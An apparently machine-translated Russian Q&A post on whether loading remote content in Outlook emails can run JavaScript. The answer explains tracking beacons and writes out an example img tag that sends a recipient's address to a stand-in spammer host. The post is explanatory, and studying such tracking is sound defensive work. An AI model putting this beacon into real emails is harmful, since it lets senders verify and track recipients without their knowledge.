Автоматическое выполнение Javascript или вредоносного кода по электронной почте

Question

В Outlook, когда мы получаем входящие сообщения из неизвестного источника, панель инструментов в верхней части сообщения позволяет нам постоянно добавлять отправитель в список безопасных отправителей или одноразовый " Загрузить содержание "

Различные люди настраивают конфигурацию для« Автоматической загрузки из любого источника »..., о которой мы советуем.

Сайт Microsoft сообщает, что содержимое HTML, сценарии или изображения можно использовать в качестве «маяка», чтобы сообщить веб-серверу лиц, что адрес электронной почты действителен.

Если вы просматриваете или просматриваете, сообщение электронной почты может быть отправлено на веб-сервер, возможно ли выполнить JS или другой вредоносный код, если HTML/изображения загружаются таким образом?

Answer 1

Не отображать изображения в электронных письмах - это скорее политика защиты от спама, принятая вашим почтовым клиентом (большинство из них в настоящее время делают это по умолчанию).

Если бы я, например, должны были искать кучу активных учетных записей электронной почты я мог просто случайно отправить сообщения, используя этот формат:

to: john@doe.com 

message: <img src="http://spammer.com/verifyAccount.png?account=john@doe.com"> 

И тогда я мог установить свой веб-сервер на spammer.com к регистрировать полученные запросы (пока тем временем предоставляя изображение), чтобы каждый раз, когда пользователь открывал одно из моих вредоносных писем, я мог быть уверен, что пользователь активен, и поэтому можно избежать траты ресурсов на неактивные или неработающие учетные записи.

Но опять же, речь идет о проблеме политики, а не об угрозах безопасности, и то же самое верно для любого внешнего ресурса (например, таблицы стилей), который может попытаться загрузить электронное письмо.

JS, как правило, даже не доступен почтовым клиентам, поэтому с этой стороны не возникает реальной угрозы.